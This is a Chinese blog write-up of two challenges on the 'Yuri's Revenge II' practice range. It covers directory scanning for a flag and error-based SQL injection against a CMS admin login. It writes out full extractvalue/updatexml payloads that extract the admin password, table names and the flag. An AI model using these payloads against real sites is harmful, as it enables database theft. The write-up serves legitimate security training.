尤里的复仇II 回归

最新推荐文章于 2024-05-13 13:59:42 发布
最新推荐文章于 2024-05-13 13:59:42 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 笔记 文章标签: sql 数据库 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51830687/article/details/120157350
版权
本文介绍了渗透测试初期的信息收集技巧,通过目录扫描找到目标网站的二级目录获取flag。接着展示了如何利用SQL注入漏洞,识别CMS类型,找到数据库名、表名、字段及数据,最终在数据库中获取flag。过程包括使用御剑扫描、F12查看器、POC验证等方法。
摘要由CSDN通过智能技术生成

尤里的复仇II 回归

渗透第一步-信息收集 1

Tips:
信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢?
尤里开始了努力……
最终他找到了目标的……
成功掌握了这一技能
基础目录扫描 传送门

题解:非常简单的目录扫描
直接用御剑扫描
在这里插入图片描述

不过flag在二级目录里
在这里插入图片描述

flag_{oh!you_find_it!}
在这里插入图片描述

渗透第一步-信息收集 2

Tips:
经过上次的事件,尤里深刻了解到信息收集的重要性,这次他决定利用信息收集轻松搞定个站点……
这个cms好像有个sql注入漏洞,找到它,拿到数据库里的flag吧!
传送门
开始拿到这题,先做了指纹识别,识别不出来就F12查看器查到了seacms
去网上查了poc,发现后台http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login有报错注入,抓包
在这里插入图片描述

user=123' or extractvalue(1,concat((select concat(0x7e,password,0x7e) from manage)))#&password=
或者
user=123' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0)#&password=

拿到user:zkaqsea
在这里插入图片描述

拿到密码:seazkaq在这里插入图片描述
在这里插入图片描述

登入后台:在这里插入图片描述
没有发现flag,想着后台还有漏洞,去网上查了下,突然再看了一遍题目,flag在数据库里,入坑了
又去抓包
查库名

1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)# ---caidian

查表名

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) # ---adword,content,download,flag,im

查字段

1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1),0x7e),1) # ---flag

查具体数据

1' or updatexml(1,concat(0x7e,(select flag from flag limit 0,1),1),1) # ---flag_{oh!congratulations!}

果然拿到flag!

sparename
关注
专栏目录
封神台(尤里复仇回归)绕过防护getshell
Bu2n的博客
01-05 3539
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
封神台(尤里复仇回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4936
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
尤里复仇II 回归【7题】
feiniaotjx的博客
10-23 2913
尤里复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
封神台-尤里复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 710
封神台-尤里复仇II 回归sql-注入绕过防护getshell
封神台-第二章 尤里复仇
ploto_cs的博客
09-26 2103
封神台-第二章 尤里复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+by+11 4.使用modheader 直接在url中输入 报错 第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin 5.在url中输入http://59.63.200.79:8004/shownews.asp
尤里复仇WIN10全屏切换不黑屏补丁
07-29
尤里复仇WIN10全屏切换不黑屏补丁》是针对经典即时战略游戏《红色警戒2:尤里复仇》在Windows 10操作系统上运行时出现的全屏切换黑屏问题而设计的一款补丁。这款补丁解决了许多玩家在尝试全屏游戏时遭遇的困扰,...
尤里复仇退出界面_红色警戒2、尤里复仇win10卡死、分辨率太大、黑屏问题多种解决方法(已测)...
热门推荐
weixin_35193131的博客
01-17 1万+
Windows 10如约而至,用户在尝试新系统新感觉体验的同时,红色警戒(红色警戒2尤里复仇,以下简称YR)——这款老游戏的命运又会如何呢?相信大家现在最关心的是:Windows 10到底能不能正常玩红警?win7下面玩都是正常的,这里就为大家分享一下多种解决方法第一种方法:兼容修改方法win10 64位系统怎么运行ra2?关于win10运行红警2设置方法红警之家分享过不少高手的经验,但这些方法...
《红色警戒2·尤里复仇》-第一章 无限金币
weixin_41798850的博客
01-04 4391
第一章 无限金币 荒塘前言: 红色警戒这款游戏相伴我童年时光,非常喜欢玩这款游戏,当年也是看着我叔打,自己慢慢磨出各种一抽七冷酷敌人的打法、北极图断桥法、5台光陵灭国,还尝试过只放一次闪电风暴直接带走满血基地(石油危机版)。但对于红警的认识还不算深入,当初我也是小学生,喜欢打街机,回家打电脑红警、拳皇、合金等,爱好打机,就是玩玩打打那种。本次逆向只专注于学识研究,望小技不耻辱,大技不买卖。 分析前准备: 红色警戒-尤利复仇单机版 CE 脑子和手 思考下:无限金币的含义? 无限...
封神台 -尤里复仇Ⅰ write up 夜车星繁的博客
夜车星繁的博客
04-09 2739
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用。因为有了点基础在此写下payload只保证自己可以看得懂。 第一章:为了女神小芳! ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 ?id=1 order by 2 ------查询了两列 ?id=100 select 1...
校园封神榜
06-21
应用于大学生在校发展,包括竞赛、项目的信息提供以及获奖情况记录,为学生提供一个开放、多元的信息平台,为日后的就业发展提供好的个人履历。 竞赛模块:将各种竞赛信息按级别分类(国家级 省级 校级),可以根据学生所学专业或兴趣爱好向用户推送竞赛信息,用户可以通过此平台进行组队,对跨专业组队提供了极大的方便。 项目模块:根据学生所学专业或兴趣爱好向用户推送项目信息,可以跟随老师做项目,或者和同学结组做创业项目。 排行榜:提供排名信息,对学生获奖情况进行通告奖励,并通过学生的参与积极性以及获奖情况等信息对学生的等级进行排名,从而起到激励的作用。 我的模块:每一个用户的个人信息模块包括用户名、专业、兴趣爱好、等级、参与的竞赛项目等信息,为用户提供详细而全面的个人记录,为个人履历的填写提供了更有力可靠地依据,提高用户的竞争实力。
Kali工具正式篇 (第二章-1) 渗透测试流程以及信息收集总纲
weixin_48617547的博客
06-15 277
大纲: 一、信息收集的作用 二、信息收集收集什么 三、通过信息收集能干嘛 四、信息收集报告编写 一、信息收集的作用是什么 Q:为什么要进行信息收集? A:了解目标的弱点和安全短板,知己知彼,才能百战不殆 注:(在渗透测试时信息收集是我们的第一步,信息收集的全面性对于后期的渗透工作必为重要,甚至关联到能不能挖掘到漏洞) 二、信息收集收集什么 Q:收集什么? A:目标人物:电话,邮箱,密码,whois…… 目标环境:域名,脚本语言,数据库,中间件,框架,cms,开放端口…… 目标事件:历史漏洞,使用手册,使用说
渗透测试——信息收集(详细)
Ays.Ie的博客
03-10 4996
该篇详细记录了渗透测试的前期——信息收集
封神台 尤里复仇II 回归 信息收集1&&2
最新发布
shierbai的博客
05-13 298
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
渗透测试之信息收集总结
baynk的博客
03-30 3404
0x00 信息收集 信息收集也称踩点,指的是黑客为了更加有效地实施攻击而在攻击前或攻击过程中对目标的所有探测活动。信息搜集是渗透测试的最重要的阶段,根据收集的有用信息,可以大大提高我们渗透测试的成功率。 信息收集的作用: 了解安全架构:信息收集使攻击者能够了解组织完整的安全架构 缩小攻击范围:通过IP地址范围、网络、域名、远程访问点等信息,可以缩小攻击范围 建立信息数据库:攻击者能够建立他们自己的相关目标组织安全性弱点的信息数据库来采取下一步的入侵行动 描绘网络拓扑:攻击者可以描绘出目标组织
渗透测试之信息收集篇
未完成的歌~的博客
02-01 6910
文章目录前言:一、域名信息收集:1、Whois查询:2、备案信息查询:二、敏感信息收集:1、Google Hacking语法:2、FOFA网络安全空间搜索:3、Github信息泄露:三、子域名收集:1、子域名检测工具:2、利用搜索引擎发现子域:3、通过在线工具搜集:四、端口探测:1、Nmap:2、Masscan扫描工具:3、在线网站:常见的端口及其说明:五、CMS指纹识别:1、在线网站:2、指纹识别工具:3、CMS漏洞查询:六、查找真实IP:1、什么是CDN:2、如何判断目标服务器使用了CDN:3、如何寻找
渗透测试之信息收集
weixin_45859734的博客
12-12 695
信息收集 在安全测试中,信息收集是非常重要的一个环节,此环节的信息将影响到后续的成功几率,掌握信息的多少将决定发现漏洞机会大小和攻击面的多少,换言之信息收集决定着你是否能完成目标的测试任务。也可以很直接的说:渗透测试的思路就是从信息收集这里开始,你与大牛的差距也是从这里开始的! 我把信息收集大致分为两种情况,有CDN和没有CDN,初学者大都还不明白CDN的概念是什么,有什么作用,所以先简单介绍一下CDN, CDN,内容分发网络(Content Delivery Network,简称CDN)是建立并覆盖在承载
渗透测试信息收集
weixin_45634365的博客
05-24 372
信息收集是渗透测试的第一步,信息收集的全面性对于后期的渗透工作十分重要,甚至关联到能不能挖掘到漏洞。当我们要对一个目标进行渗透测试时,为了防止无从下手,我们首先要获得目标的信息,掌握详细情况,了解目标的弱点和安全短板。 SRC之信息收集 绕过CDN查找真实IP 密码攻击器 目标人物 电话,邮箱,密码,whois 目标环境 域名,脚本语言,数据库,中间件,框架,cms,开放端口 目标事件 历史漏洞,使用手册,使用说明,通知,公众号 ...
封神台(尤里复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 697
尤里复仇,做过一遍重新复现一次,练习渗透测试
YurisHarbour Ra2地图包解析与应用
3. YURI: 在这里,YURI很可能是指游戏《红色警戒2》的一个扩展包或模组(Mod),全称为《红色警戒2:尤里复仇》(Command & Conquer: Red Alert 2 - Yuri's Revenge)。Yuri是游戏中的一个可玩阵营,代表着疯狂的...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sparename

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值